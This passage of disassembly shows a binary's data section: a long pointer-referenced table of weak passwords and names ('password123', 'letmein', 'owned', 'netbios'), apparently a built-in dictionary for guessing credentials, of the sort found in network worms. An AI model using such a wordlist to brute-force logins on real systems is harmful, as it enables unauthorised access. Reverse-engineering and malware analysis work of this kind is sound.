aPierre db 'pierre',0 ; DATA XREF: .text:0042D870�o
align 4
aPick db 'pick',0 ; DATA XREF: .text:0042D86C�o
align 10h
aPhuck db 'phuck',0 ; DATA XREF: .text:0042D868�o
align 4
aPhreak db 'phreak',0 ; DATA XREF: .text:0042D864�o
align 10h
aPhrase db 'phrase',0 ; DATA XREF: .text:0042D860�o
align 4
aPhrack db 'phrack',0 ; DATA XREF: .text:0042D85C�o
align 10h
aPhoton db 'photon',0 ; DATA XREF: .text:0042D858�o
align 4
aPhone db 'phone',0 ; DATA XREF: .text:0042D854�o
align 10h
aPhoenix db 'phoenix',0 ; DATA XREF: .text:0042D850�o
aPhilip db 'philip',0 ; DATA XREF: .text:0042D84C�o
align 10h
aPhil db 'phil',0 ; DATA XREF: .text:0042D848�o
align 4
aPeter db 'peter',0 ; DATA XREF: .text:0042D844�o
align 10h
aPete db 'pete',0 ; DATA XREF: .text:0042D840�o
align 4
aPervert db 'pervert',0 ; DATA XREF: .text:0042D83C�o
aPersona db 'persona',0 ; DATA XREF: .text:0042D838�o
aPersimmon db 'persimmon',0 ; DATA XREF: .text:0042D834�o
align 4
aPersimmo db 'persimmo',0 ; DATA XREF: .text:0042D830�o
align 10h
aPermit db 'permit',0 ; DATA XREF: .text:0042D82C�o
align 4
aPerfect db 'perfect',0 ; DATA XREF: .text:0042D828�o
aPercolate db 'percolate',0 ; DATA XREF: .text:0042D824�o
align 4
aPercolat db 'percolat',0 ; DATA XREF: .text:0042D820�o
align 4
aPepsi db 'pepsi',0 ; DATA XREF: .text:0042D81C�o
align 10h
aPepper db 'pepper',0 ; DATA XREF: .text:0042D818�o
align 4
aPeoria db 'peoria',0 ; DATA XREF: .text:0042D814�o
align 10h
aPentium db 'pentium',0 ; DATA XREF: .text:0042D810�o
aPenthous db 'penthous',0 ; DATA XREF: .text:0042D80C�o
align 4
aPentagra db 'pentagra',0 ; DATA XREF: .text:0042D808�o
align 10h
aPentagon db 'pentagon',0 ; DATA XREF: .text:0042D804�o
align 4
aPenname db 'penname',0 ; DATA XREF: .text:0042D800�o
aPenis db 'penis',0 ; DATA XREF: .text:0042D7FC�o
align 4
aPenguin db 'penguin',0 ; DATA XREF: .text:0042D7F8�o
aPenelope db 'penelope',0 ; DATA XREF: .text:0042D7F4�o
align 10h
aPencil db 'pencil',0 ; DATA XREF: .text:0042D7F0�o
align 4
aPecker db 'pecker',0 ; DATA XREF: .text:0042D7EC�o
align 10h
aPeanuts db 'peanuts',0 ; DATA XREF: .text:0042D7E8�o
aPc db 'pc',0 ; DATA XREF: .text:0042D7E4�o
align 4
aPaula db 'paula',0 ; DATA XREF: .text:0042D7E0�o
align 4
aPatty db 'patty',0 ; DATA XREF: .text:0042D7DC�o
align 4
aPatriot db 'patriot',0 ; DATA XREF: .text:0042D7D8�o
aPatrick db 'patrick',0 ; DATA XREF: .text:0042D7D4�o
aPatricia db 'patricia',0 ; DATA XREF: .text:0042D7D0�o
align 4
aPat db 'pat',0 ; DATA XREF: .text:0042D7CC�o
aPaste db 'paste',0 ; DATA XREF: .text:0042D7C8�o
align 4
aPassword123 db 'password123',0 ; DATA XREF: .text:0042D7C4�o
aPassword1 db 'password1',0 ; DATA XREF: .text:0042D7C0�o
; .text:0042E640�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0042D7BC�o
align 4
aPassphra db 'passphra',0 ; DATA XREF: .text:0042D7B8�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0042D7B4�o
align 4
aPass123 db 'pass123',0 ; DATA XREF: .text:0042D7B0�o
aPass_0 db 'pass',0 ; DATA XREF: .text:0042D7AC�o
align 4
aPascal db 'pascal',0 ; DATA XREF: .text:0042D7A8�o
align 4
aPapers db 'papers',0 ; DATA XREF: .text:0042D7A4�o
align 4
aPaper db 'paper',0 ; DATA XREF: .text:0042D7A0�o
align 4
aPapa db 'papa',0 ; DATA XREF: .text:0042D79C�o
align 4
aPamela db 'pamela',0 ; DATA XREF: .text:0042D798�o
align 4
aPam db 'pam',0 ; DATA XREF: .text:0042D794�o
aPakistan db 'pakistan',0 ; DATA XREF: .text:0042D790�o
align 4
aPaint db 'paint',0 ; DATA XREF: .text:0042D78C�o
align 4
aPainless db 'painless',0 ; DATA XREF: .text:0042D788�o
align 4
aPad db 'pad',0 ; DATA XREF: .text:0042D784�o
aPacker db 'packer',0 ; DATA XREF: .text:0042D780�o
align 4
aPackard db 'packard',0 ; DATA XREF: .text:0042D77C�o
aPacific db 'pacific',0 ; DATA XREF: .text:0042D778�o
aOxford db 'oxford',0 ; DATA XREF: .text:0042D774�o
align 4
aOwned db 'owned',0 ; DATA XREF: .text:0042D770�o
align 4
aOwn db 'own',0 ; DATA XREF: .text:0042D76C�o
aOwa db 'owa',0 ; DATA XREF: .text:0042D768�o
aOutside db 'outside',0 ; DATA XREF: .text:0042D764�o
aOutput db 'output',0 ; DATA XREF: .text:0042D760�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: .text:0042D75C�o
aOutlaw db 'outlaw',0 ; DATA XREF: .text:0042D758�o
align 4
aOutdoors db 'outdoors',0 ; DATA XREF: .text:0042D754�o
align 4
aOsiris db 'osiris',0 ; DATA XREF: .text:0042D750�o
align 10h
aOscar db 'oscar',0 ; DATA XREF: .text:0042D74C�o
align 4
aOrwell db 'orwell',0 ; DATA XREF: .text:0042D748�o
align 10h
aOrient db 'orient',0 ; DATA XREF: .text:0042D744�o
align 4
aOrca db 'orca',0 ; DATA XREF: .text:0042D740�o
align 10h
aOrange db 'orange',0 ; DATA XREF: .text:0042D73C�o
align 4
aOperator db 'operator',0 ; DATA XREF: .text:0042D734�o
align 4
aOpensesa db 'opensesa',0 ; DATA XREF: .text:0042D730�o
align 10h
aOpenlock db 'openlock',0 ; DATA XREF: .text:0042D72C�o
align 4
aOpening db 'opening',0 ; DATA XREF: .text:0042D728�o
aOmega db 'omega',0 ; DATA XREF: .text:0042D720�o
align 4
aOlivia db 'olivia',0 ; DATA XREF: .text:0042D71C�o
align 4
aOlivetti db 'olivetti',0 ; DATA XREF: .text:0042D718�o
align 10h
aOldage db 'oldage',0 ; DATA XREF: .text:0042D714�o
align 4
aOkay db 'okay',0 ; DATA XREF: .text:0042D710�o
align 10h
aOffice db 'office',0 ; DATA XREF: .text:0042D70C�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .text:0042D708�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .text:0042D704�o
align 4
aOcelot db 'ocelot',0 ; DATA XREF: .text:0042D700�o
align 4
aOceanography db 'oceanography',0 ; DATA XREF: .text:0042D6FC�o
align 4
aOceanogr db 'oceanogr',0 ; DATA XREF: .text:0042D6F8�o
align 10h
aObscurit db 'obscurit',0 ; DATA XREF: .text:0042D6F4�o
align 4
aNyquist db 'nyquist',0 ; DATA XREF: .text:0042D6F0�o
aNuts db 'nuts',0 ; DATA XREF: .text:0042D6EC�o
align 4
aNutrition db 'nutrition',0 ; DATA XREF: .text:0042D6E8�o
align 4
aNutritio db 'nutritio',0 ; DATA XREF: .text:0042D6E4�o
align 4
aNumber db 'number',0 ; DATA XREF: .text:0042D6E0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .text:0042D6DC�o
align 4
aNukem db 'nukem',0 ; DATA XREF: .text:0042D6D8�o
align 4
aNuke db 'nuke',0 ; DATA XREF: .text:0042D6D4�o
align 4
aNude db 'nude',0 ; DATA XREF: .text:0042D6D0�o
align 4
aNuclear db 'nuclear',0 ; DATA XREF: .text:0042D6CC�o
aNoxious db 'noxious',0 ; DATA XREF: .text:0042D6C8�o
aNovember db 'november',0 ; DATA XREF: .text:0042D6C4�o
align 4
aNovel db 'novel',0 ; DATA XREF: .text:0042D6C0�o
align 10h
aNova db 'nova',0 ; DATA XREF: .text:0042D6BC�o
align 4
aNoth db 'noth',0 ; DATA XREF: .text:0042D6B8�o
align 10h
aNotes db 'notes',0 ; DATA XREF: .text:0042D6B4�o
align 4
aNoreen db 'noreen',0 ; DATA XREF: .text:0042D6B0�o
align 10h
aNoob db 'noob',0 ; DATA XREF: .text:0042D6AC�o
align 4
aNone db 'none',0 ; DATA XREF: .text:0042D6A8�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .text:0042D6A4�o
align 4
aNode db 'node',0 ; DATA XREF: .text:0042D6A0�o
align 10h
aNobody db 'nobody',0 ; DATA XREF: .text:0042D69C�o
align 4
aNoble db 'noble',0 ; DATA XREF: .text:0042D698�o
align 10h
aNnaacp db 'nnaacp',0 ; DATA XREF: .text:0042D694�o
align 4
aNita db 'nita',0 ; DATA XREF: .text:0042D690�o
align 10h
aNintendo db 'nintendo',0 ; DATA XREF: .text:0042D68C�o
align 4
aNightmar db 'nightmar',0 ; DATA XREF: .text:0042D688�o
align 4
aNight db 'night',0 ; DATA XREF: .text:0042D684�o
align 10h
aNicotine db 'nicotine',0 ; DATA XREF: .text:0042D680�o
align 4
aNicole db 'nicole',0 ; DATA XREF: .text:0042D67C�o
align 4
aNice db 'nice',0 ; DATA XREF: .text:0042D678�o
align 4
aNext db 'next',0 ; DATA XREF: .text:0042D674�o
align 4
aNewyork db 'newyork',0 ; DATA XREF: .text:0042D670�o
aNewton db 'newton',0 ; DATA XREF: .text:0042D66C�o
align 4
aNewsgrou db 'newsgrou',0 ; DATA XREF: .text:0042D668�o
align 10h
aNews db 'news',0 ; DATA XREF: .text:0042D664�o
align 4
aNewborn db 'newborn',0 ; DATA XREF: .text:0042D660�o
aNew db 'new',0 ; DATA XREF: .text:0042D65C�o
aNetwork_0 db 'network',0 ; DATA XREF: .text:0042D658�o
aNetscape db 'netscape',0 ; DATA XREF: .text:0042D654�o
align 4
aNetfuck db 'netfuck',0 ; DATA XREF: .text:0042D650�o
aNetdevil db 'netdevil',0 ; DATA XREF: .text:0042D64C�o
align 4
aNetbios db 'netbios',0 ; DATA XREF: .text:0042D648�o
aNetDevil db 'net-devil',0 ; DATA XREF: .text:0042D644�o
align 10h
aNet db 'net',0 ; DATA XREF: .text:0042D640�o
aNess db 'ness',0 ; DATA XREF: .text:0042D63C�o
align 4
aNeptune db 'neptune',0 ; DATA XREF: .text:0042D638�o
aNepenthe db 'nepenthe',0 ; DATA XREF: .text:0042D634�o
align 10h
aNeil db 'neil',0 ; DATA XREF: .text:0042D630�o
align 4
aNavy db 'navy',0 ; DATA XREF: .text:0042D62C�o
align 10h
aNasa db 'nasa',0 ; DATA XREF: .text:0042D628�o
align 4
aNapoleon db 'napoleon',0 ; DATA XREF: .text:0042D624�o
align 4
aNancy db 'nancy',0 ; DATA XREF: .text:0042D620�o
align 4
aName db 'name',0 ; DATA XREF: .text:0042D61C�o
align 4
aNagel db 'nagel',0 ; DATA XREF: .text:0042D618�o
align 4
aMypc123 db 'mypc123',0 ; DATA XREF: .text:0042D614�o
aMypc db 'mypc',0 ; DATA XREF: .text:0042D610�o
align 4
aMypass123 db 'mypass123',0 ; DATA XREF: .text:0042D60C�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:0042D608�o
align 10h
aMutant db 'mutant',0 ; DATA XREF: .text:0042D604�o
align 4
aMuppets db 'muppets',0 ; DATA XREF: .text:0042D600�o
aMsdos db 'msdos',0 ; DATA XREF: .text:0042D5FC�o
align 4
aMpeg db 'mpeg',0 ; DATA XREF: .text:0042D5F8�o
align 10h
aMozart db 'mozart',0 ; DATA XREF: .text:0042D5F4�o
align 4
aMovies db 'movies',0 ; DATA XREF: .text:0042D5F0�o
align 10h
aMovie db 'movie',0 ; DATA XREF: .text:0042D5EC�o
align 4
aMove db 'move',0 ; DATA XREF: .text:0042D5E8�o
align 10h
aMouse db 'mouse',0 ; DATA XREF: .text:0042D5E4�o
align 4
aMountain db 'mountain',0 ; DATA XREF: .text:0042D5E0�o
align 4
aMosaic db 'mosaic',0 ; DATA XREF: .text:0042D5DC�o
align 4
aMortgage db 'mortgage',0 ; DATA XREF: .text:0042D5D8�o
align 4
aMortalco db 'mortalco',0 ; DATA XREF: .text:0042D5D4�o
align 4
aMortal db 'mortal',0 ; DATA XREF: .text:0042D5D0�o
align 4
aMorris db 'morris',0 ; DATA XREF: .text:0042D5CC�o
align 4
aMorley db 'morley',0 ; DATA XREF: .text:0042D5C8�o
align 4
aMore db 'more',0 ; DATA XREF: .text:0042D5C4�o
align 4
aMoose db 'moose',0 ; DATA XREF: .text:0042D5C0�o
align 4
aMoor db 'moor',0 ; DATA XREF: .text:0042D5BC�o
align 4
aMoom db 'moom',0 ; DATA XREF: .text:0042D5B8�o
align 4
aMonica db 'monica',0 ; DATA XREF: .text:0042D5B4�o
align 4
aMonday db 'monday',0 ; DATA XREF: .text:0042D5B0�o
align 4
aMoguls db 'moguls',0 ; DATA XREF: .text:0042D5AC�o
align 4
aMogul db 'mogul',0 ; DATA XREF: .text:0042D5A8�o
align 4
aModem db 'modem',0 ; DATA XREF: .text:0042D5A4�o
align 4
aMode db 'mode',0 ; DATA XREF: .text:0042D5A0�o
align 4
aMkii db 'mkii',0 ; DATA XREF: .text:0042D59C�o
align 4
aMit db 'mit',0 ; DATA XREF: .text:0042D598�o
aMission db 'mission',0 ; DATA XREF: .text:0042D594�o
aMisfit db 'misfit',0 ; DATA XREF: .text:0042D590�o
align 4
aMirc_0 db 'mirc',0 ; DATA XREF: .text:0042D58C�o
align 10h
aMinsky db 'minsky',0 ; DATA XREF: .text:0042D588�o
align 4
aMinimum db 'minimum',0 ; DATA XREF: .text:0042D584�o
aMine db 'mine',0 ; DATA XREF: .text:0042D580�o
align 4
aMike db 'mike',0 ; DATA XREF: .text:0042D57C�o
align 10h
aMidieval db 'midieval',0 ; DATA XREF: .text:0042D578�o
align 4
aMicrosof db 'microsof',0 ; DATA XREF: .text:0042D574�o
align 4
aMicropro db 'micropro',0 ; DATA XREF: .text:0042D570�o
align 4
aMicrochi db 'microchi',0 ; DATA XREF: .text:0042D56C�o
align 10h
aMicro db 'micro',0 ; DATA XREF: .text:0042D568�o
align 4
aMickey db 'mickey',0 ; DATA XREF: .text:0042D564�o
align 10h
aMichelle db 'michelle',0 ; DATA XREF: .text:0042D560�o
align 4
aMichele db 'michele',0 ; DATA XREF: .text:0042D55C�o
aMichelan db 'michelan',0 ; DATA XREF: .text:0042D558�o
align 10h
aMichel db 'michel',0 ; DATA XREF: .text:0042D554�o
align 4
aMichael db 'michael',0 ; DATA XREF: .text:0042D550�o
aMice db 'mice',0 ; DATA XREF: .text:0042D54C�o
align 4
aMgr db 'mgr',0 ; DATA XREF: .text:0042D548�o
aMets db 'mets',0 ; DATA XREF: .text:0042D544�o
align 4
aMetalica db 'metalica',0 ; DATA XREF: .text:0042D540�o
align 10h
aMetalhea db 'metalhea',0 ; DATA XREF: .text:0042D53C�o
align 4
aMetal db 'metal',0 ; DATA XREF: .text:0042D538�o
align 4
aMerlin db 'merlin',0 ; DATA XREF: .text:0042D534�o
align 4
aMercury db 'mercury',0 ; DATA XREF: .text:0042D508�o
; .text:0042D530�o
aMenu db 'menu',0 ; DATA XREF: .text:0042D504�o
; .text:0042D52C�o
align 4
aMenace db 'menace',0 ; DATA XREF: .text:0042D500�o
; .text:0042D528�o
align 4
aMemory db 'memory',0 ; DATA XREF: .text:0042D4FC�o
; .text:0042D524�o
align 4
aMember db 'member',0 ; DATA XREF: .text:0042D4F8�o
; .text:0042D520�o
align 4
aMelrose db 'melrose',0 ; DATA XREF: .text:0042D4F4�o
; .text:0042D51C�o
aMellon db 'mellon',0 ; DATA XREF: .text:0042D4F0�o
; .text:0042D518�o
align 4
aMelissa db 'melissa',0 ; DATA XREF: .text:0042D4EC�o
; .text:0042D514�o
aMegan db 'megan',0 ; DATA XREF: .text:0042D4E8�o
; .text:0042D510�o
align 4
aMegadeth db 'megadeth',0 ; DATA XREF: .text:0042D4E4�o
; .text:0042D50C�o
align 10h
aMegabyte db 'megabyte',0 ; DATA XREF: .text:0042D4E0�o
align 4
aMeagan db 'meagan',0 ; DATA XREF: .text:0042D4DC�o
align 4
aMaurice db 'maurice',0 ; DATA XREF: .text:0042D4D8�o
aMath db 'math',0 ; DATA XREF: .text:0042D4D4�o
align 4
aMaster db 'master',0 ; DATA XREF: .text:0042D4D0�o
align 4
aMass db 'mass',0 ; DATA XREF: .text:0042D4CC�o
align 4
aMason db 'mason',0 ; DATA XREF: .text:0042D4C8�o
align 4
aMary db 'mary',0 ; DATA XREF: .text:0042D4C4�o
align 4
aMarvin db 'marvin',0 ; DATA XREF: .text:0042D4C0�o
align 4
aMarty db 'marty',0 ; DATA XREF: .text:0042D4BC�o
align 4
aMars db 'mars',0 ; DATA XREF: .text:0042D4B8�o
align 4
aMarriage db 'marriage',0 ; DATA XREF: .text:0042D4B4�o
align 4
aMarni db 'marni',0 ; DATA XREF: .text:0042D4B0�o
align 10h
aMarkus db 'markus',0 ; DATA XREF: .text:0042D4AC�o
align 4
aMark db 'mark',0 ; DATA XREF: .text:0042D4A8�o
align 10h
aMarines db 'marines',0 ; DATA XREF: .text:0042D4A4�o
aMarijuan db 'marijuan',0 ; DATA XREF: .text:0042D4A0�o
align 4
aMarietta db 'marietta',0 ; DATA XREF: .text:0042D49C�o
align 10h
aMariens db 'mariens',0 ; DATA XREF: .text:0042D498�o
aMaria db 'maria',0 ; DATA XREF: .text:0042D494�o
align 10h
aMarcy db 'marcy',0 ; DATA XREF: .text:0042D490�o
align 4
aMarci db 'marci',0 ; DATA XREF: .text:0042D48C�o
align 10h
aMara db 'mara',0 ; DATA XREF: .text:0042D488�o
align 4
aManager db 'manager',0 ; DATA XREF: .text:0042D484�o
aMana db 'mana',0 ; DATA XREF: .text:0042D480�o
align 4
aMalcom db 'malcom',0 ; DATA XREF: .text:0042D47C�o
align 10h
aMalcolm db 'malcolm',0 ; DATA XREF: .text:0042D478�o
aMaint db 'maint',0 ; DATA XREF: .text:0042D474�o
align 10h
aMain db 'main',0 ; DATA XREF: .text:0042D470�o
align 4
aMail db 'mail',0 ; DATA XREF: .text:0042D46C�o
align 10h
aMagnet db 'magnet',0 ; DATA XREF: .text:0042D468�o
align 4
aMagic db 'magic',0 ; DATA XREF: .text:0042D464�o
align 10h
aMaggot db 'maggot',0 ; DATA XREF: .text:0042D460�o
align 4
aMacro db 'macro',0 ; DATA XREF: .text:0042D45C�o
align 10h
aMack db 'mack',0 ; DATA XREF: .text:0042D458�o
align 4
aMacintosh db 'macintosh',0 ; DATA XREF: .text:0042D454�o
align 4
aMacintos db 'macintos',0 ; DATA XREF: .text:0042D450�o
align 10h
aMachine db 'machine',0 ; DATA XREF: .text:0042D44C�o
aLynne db 'lynne',0 ; DATA XREF: .text:0042D448�o
align 10h
aLynn db 'lynn',0 ; DATA XREF: .text:0042D444�o
align 4
aLust db 'lust',0 ; DATA XREF: .text:0042D440�o
align 10h
aLuke db 'luke',0 ; DATA XREF: .text:0042D43C�o
align 4
aLude db 'lude',0 ; DATA XREF: .text:0042D438�o
align 10h
aLucy db 'lucy',0 ; DATA XREF: .text:0042D434�o
align 4
aLucus db 'lucus',0 ; DATA XREF: .text:0042D430�o
align 10h
aLuck db 'luck',0 ; DATA XREF: .text:0042D42C�o
align 4
aLover db 'lover',0 ; DATA XREF: .text:0042D428�o
align 10h
aLovebug db 'lovebug',0 ; DATA XREF: .text:0042D424�o
aLove db 'love',0 ; DATA XREF: .text:0042D420�o
align 10h
aLouis db 'louis',0 ; DATA XREF: .text:0042D41C�o
align 4
aLoser db 'loser',0 ; DATA XREF: .text:0042D418�o
align 10h
aLorraine db 'lorraine',0 ; DATA XREF: .text:0042D414�o
align 4
aLorin db 'lorin',0 ; DATA XREF: .text:0042D410�o
align 4
aLori db 'lori',0 ; DATA XREF: .text:0042D40C�o
align 4
aLore db 'lore',0 ; DATA XREF: .text:0042D408�o
align 4
aLoose db 'loose',0 ; DATA XREF: .text:0042D404�o
align 4
aLolopc db 'lolopc',0 ; DATA XREF: .text:0042D400�o
align 4
aLol db 'lol',0 ; DATA XREF: .text:0042D3FC�o
aLois db 'lois',0 ; DATA XREF: .text:0042D3F8�o
align 10h
aLogout db 'logout',0 ; DATA XREF: .text:0042D3F4�o
align 4
aLoginwor db 'loginwor',0 ; DATA XREF: .text:0042D3F0�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .text:0042D3EC�o
align 10h
aLogic db 'logic',0 ; DATA XREF: .text:0042D3E8�o
align 4
aLockword db 'lockword',0 ; DATA XREF: .text:0042D3E4�o
align 4
aLockout db 'lockout',0 ; DATA XREF: .text:0042D3E0�o
aLock db 'lock',0 ; DATA XREF: .text:0042D3DC�o
align 4
aLoad db 'load',0 ; DATA XREF: .text:0042D3D8�o
align 4
aLiz db 'liz',0 ; DATA XREF: .text:0042D3D4�o
aLive db 'live',0 ; DATA XREF: .text:0042D3D0�o
align 4
aLiteratu db 'literatu',0 ; DATA XREF: .text:0042D3CC�o
align 4
aLisp db 'lisp',0 ; DATA XREF: .text:0042D3C8�o
align 4
aLisa db 'lisa',0 ; DATA XREF: .text:0042D3C4�o
align 4
aLips db 'lips',0 ; DATA XREF: .text:0042D3C0�o
align 4
aLion db 'lion',0 ; DATA XREF: .text:0042D3BC�o
align 4
aLinux db 'linux',0 ; DATA XREF: .text:0042D3B8�o
align 4
aLink db 'link',0 ; DATA XREF: .text:0042D3B4�o
align 4
aLinda db 'linda',0 ; DATA XREF: .text:0042D3B0�o
align 4
aLimited db 'limited',0 ; DATA XREF: .text:0042D3AC�o
aLimbaugh db 'limbaugh',0 ; DATA XREF: .text:0042D3A8�o
align 10h
aLima db 'lima',0 ; DATA XREF: .text:0042D3A4�o
align 4
aLightsab db 'lightsab',0 ; DATA XREF: .text:0042D3A0�o
align 4
aLight db 'light',0 ; DATA XREF: .text:0042D39C�o
align 4
aLife db 'life',0 ; DATA XREF: .text:0042D398�o
align 4
aLicker db 'licker',0 ; DATA XREF: .text:0042D394�o
align 4
aLick db 'lick',0 ; DATA XREF: .text:0042D390�o
align 4
aLibrary db 'library',0 ; DATA XREF: .text:0042D38C�o
aLiberal db 'liberal',0 ; DATA XREF: .text:0042D388�o
aLexluthe db 'lexluthe',0 ; DATA XREF: .text:0042D384�o
align 10h
aLewis db 'lewis',0 ; DATA XREF: .text:0042D380�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .text:0042D37C�o
aLeslie db 'leslie',0 ; DATA XREF: .text:0042D378�o
align 4
aLesbian db 'lesbian',0 ; DATA XREF: .text:0042D374�o
aLeroy db 'leroy',0 ; DATA XREF: .text:0042D370�o
align 4
aLeland db 'leland',0 ; DATA XREF: .text:0042D36C�o
align 10h
aLegal db 'legal',0 ; DATA XREF: .text:0042D368�o
align 4
aLeftwing db 'leftwing',0 ; DATA XREF: .text:0042D364�o
align 4
aLeft db 'left',0 ; DATA XREF: .text:0042D360�o
align 4
aLeet db 'leet',0 ; DATA XREF: .text:0042D35C�o
align 4
aLee db 'lee',0 ; DATA XREF: .text:0042D358�o
aLebesgue db 'lebesgue',0 ; DATA XREF: .text:0042D354�o
align 4
aLeah db 'leah',0 ; DATA XREF: .text:0042D350�o
align 4
aLazer db 'lazer',0 ; DATA XREF: .text:0042D34C�o
align 4
aLazarus db 'lazarus',0 ; DATA XREF: .text:0042D348�o
aLava db 'lava',0 ; DATA XREF: .text:0042D344�o
align 4
aLaura db 'laura',0 ; DATA XREF: .text:0042D340�o
align 4
aLaser db 'laser',0 ; DATA XREF: .text:0042D33C�o
align 4
aLarry db 'larry',0 ; DATA XREF: .text:0042D338�o
align 4
aLarkin db 'larkin',0 ; DATA XREF: .text:0042D334�o
align 4
aLara db 'lara',0 ; DATA XREF: .text:0042D330�o
align 4
aLaptop db 'laptop',0 ; DATA XREF: .text:0042D32C�o
align 4
aLana db 'lana',0 ; DATA XREF: .text:0042D328�o
align 4
aLan db 'lan',0 ; DATA XREF: .text:0042D324�o
aLamination db 'lamination',0 ; DATA XREF: .text:0042D320�o
align 4
aLaminati db 'laminati',0 ; DATA XREF: .text:0042D31C�o
align 4
aLambda db 'lambda',0 ; DATA XREF: .text:0042D318�o
align 10h
aLakers db 'lakers',0 ; DATA XREF: .text:0042D314�o
align 4
aLadle db 'ladle',0 ; DATA XREF: .text:0042D310�o
align 10h
aLadies db 'ladies',0 ; DATA XREF: .text:0042D30C�o
align 4
aL33t db 'l33t',0 ; DATA XREF: .text:0042D308�o
align 10h
aL337 db 'l337',0 ; DATA XREF: .text:0042D304�o
align 4
aKristy db 'kristy',0 ; DATA XREF: .text:0042D300�o
align 10h
aKristine db 'kristine',0 ; DATA XREF: .text:0042D2FC�o
align 4
aKristin db 'kristin',0 ; DATA XREF: .text:0042D2F8�o
aKristie db 'kristie',0 ; DATA XREF: .text:0042D2F4�o
aKristi db 'kristi',0 ; DATA XREF: .text:0042D2F0�o
align 4
aKristen db 'kristen',0 ; DATA XREF: .text:0042D2EC�o
aKrista db 'krista',0 ; DATA XREF: .text:0042D2E8�o
align 4
aKnown db 'known',0 ; DATA XREF: .text:0042D2E4�o
align 4
aKnightma db 'knightma',0 ; DATA XREF: .text:0042D2E0�o
align 4
aKnight db 'knight',0 ; DATA XREF: .text:0042D2DC�o
align 10h
aKnife db 'knife',0 ; DATA XREF: .text:0042D2D8�o
align 4
aKlingon db 'klingon',0 ; DATA XREF: .text:0042D2D4�o
aKitten db 'kitten',0 ; DATA XREF: .text:0042D2D0�o
align 4
aKissmyas db 'kissmyas',0 ; DATA XREF: .text:0042D2CC�o
align 4
aKiss db 'kiss',0 ; DATA XREF: .text:0042D2C8�o
align 4
aKirkland db 'kirkland',0 ; DATA XREF: .text:0042D2C4�o
align 4
aKirk db 'kirk',0 ; DATA XREF: .text:0042D2C0�o
align 10h
aKing db 'king',0 ; DATA XREF: .text:0042D2BC�o
align 4
aKimberly db 'kimberly',0 ; DATA XREF: .text:0042D2B8�o
align 4
aKim db 'kim',0 ; DATA XREF: .text:0042D2B4�o
aKilo db 'kilo',0 ; DATA XREF: .text:0042D2B0�o
align 10h
aKillthem db 'killthem',0 ; DATA XREF: .text:0042D2AC�o
align 4
aKiller db 'killer',0 ; DATA XREF: .text:0042D2A8�o
align 4
aKill db 'kill',0 ; DATA XREF: .text:0042D2A4�o
align 4
aKids db 'kids',0 ; DATA XREF: .text:0042D2A0�o
align 4
aKiddie db 'kiddie',0 ; DATA XREF: .text:0042D29C�o
align 4
aKeyword db 'keyword',0 ; DATA XREF: .text:0042D298�o
aKeyin db 'keyin',0 ; DATA XREF: .text:0042D294�o
align 4
aKeybord db 'keybord',0 ; DATA XREF: .text:0042D290�o
aKewl db 'kewl',0 ; DATA XREF: .text:0042D288�o
align 4
aKevin db 'kevin',0 ; DATA XREF: .text:0042D284�o
align 4
aKerry db 'kerry',0 ; DATA XREF: .text:0042D280�o
align 4
aKerrie db 'kerrie',0 ; DATA XREF: .text:0042D27C�o
align 4
aKerri db 'kerri',0 ; DATA XREF: .text:0042D278�o
align 4
aKernel db 'kernel',0 ; DATA XREF: .text:0042D274�o
align 4
aKermit db 'kermit',0 ; DATA XREF: .text:0042D270�o
align 4
aKeri db 'keri',0 ; DATA XREF: .text:0042D26C�o
align 4
aKelly db 'kelly',0 ; DATA XREF: .text:0042D268�o
align 4
aKatrina db 'katrina',0 ; DATA XREF: .text:0042D264�o
aKatina db 'katina',0 ; DATA XREF: .text:0042D260�o
align 4
aKatie db 'katie',0 ; DATA XREF: .text:0042D25C�o
align 4
aKathy db 'kathy',0 ; DATA XREF: .text:0042D258�o
align 4
aKathrine db 'kathrine',0 ; DATA XREF: .text:0042D254�o
align 4
aKathleen db 'kathleen',0 ; DATA XREF: .text:0042D250�o
align 4
aKate db 'kate',0 ; DATA XREF: .text:0042D24C�o
align 4
aKatana db 'katana',0 ; DATA XREF: .text:0042D248�o
align 4
aKarina db 'karina',0 ; DATA XREF: .text:0042D244�o
align 4
aKarie db 'karie',0 ; DATA XREF: .text:0042D240�o
align 4
aKaren db 'karen',0 ; DATA XREF: .text:0042D23C�o
align 4
aKaka db 'kaka',0 ; DATA XREF: .text:0042D238�o
align 4
aJupiter db 'jupiter',0 ; DATA XREF: .text:0042D234�o
aJune db 'june',0 ; DATA XREF: .text:0042D230�o
align 4
aJuliet db 'juliet',0 ; DATA XREF: .text:0042D22C�o
align 4
aJulie db 'julie',0 ; DATA XREF: .text:0042D228�o
align 4
aJulia db 'julia',0 ; DATA XREF: .text:0042D224�o
align 4
aJuicy db 'juicy',0 ; DATA XREF: .text:0042D220�o
align 4
aJuggle db 'juggle',0 ; DATA XREF: .text:0042D21C�o
align 4
aJudy db 'judy',0 ; DATA XREF: .text:0042D218�o
align 4
aJudith db 'judith',0 ; DATA XREF: .text:0042D214�o
align 4
aJoyce db 'joyce',0 ; DATA XREF: .text:0042D210�o
align 4
aJoy db 'joy',0 ; DATA XREF: .text:0042D20C�o
aJournal db 'journal',0 ; DATA XREF: .text:0042D208�o
aJoshua db 'joshua',0 ; DATA XREF: .text:0042D204�o
align 4
aJoseph db 'joseph',0 ; DATA XREF: .text:0042D200�o
align 10h
aJohnny db 'johnny',0 ; DATA XREF: .text:0042D1FC�o
align 4
aJohndoe db 'johndoe',0 ; DATA XREF: .text:0042D1F8�o
aJohn db 'john',0 ; DATA XREF: .text:0042D1F4�o
align 4
aJoe db 'joe',0 ; DATA XREF: .text:0042D1F0�o
aJody db 'jody',0 ; DATA XREF: .text:0042D1EC�o
align 4
aJoanne db 'joanne',0 ; DATA XREF: .text:0042D1E8�o
align 4
aJoan db 'joan',0 ; DATA XREF: .text:0042D1E4�o
align 4
aJixian db 'jixian',0 ; DATA XREF: .text:0042D1E0�o
align 4
aJill db 'jill',0 ; DATA XREF: .text:0042D1DC�o
align 4
